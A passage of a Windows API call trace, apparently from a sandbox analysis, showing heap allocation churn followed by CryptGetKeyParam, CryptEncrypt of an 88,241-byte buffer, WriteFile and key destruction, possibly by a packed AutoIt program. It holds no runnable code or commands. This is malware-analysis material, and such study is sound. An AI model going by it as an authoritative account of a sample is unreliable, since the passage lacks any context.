Size=0x10) returned 0x43caa60 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0118.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0118.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.396] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0118.396] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e28c0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e28c0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0118.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.398] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.398] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.398] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0118.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0118.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0118.399] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.410] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.410] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x158aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x158b0) returned 1 [0118.410] CharLowerBuffW (in: lpsz="byte[88241]", cchLength=0xb | out: lpsz="byte[88241]") returned 0xb [0118.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.411] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49af8c0*, pdwDataLen=0x144e790*=0x158aa, dwBufLen=0x158b0 | out: pbData=0x49af8c0*, pdwDataLen=0x144e790*=0x158b0) returned 1 [0118.411] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.414] WriteFile (in: hFile=0x2a0, lpBuffer=0x452b8c8*, nNumberOfBytesToWrite=0x158b0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x452b8c8*, lpNumberOfBytesWritten=0x144f194*=0x158b0, lpOverlapped=0x0) returned 1 [0118.416] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0118.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0118.416] CryptDestroyKey (hKey=0x41ac140) returned 1 [0118.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.417] 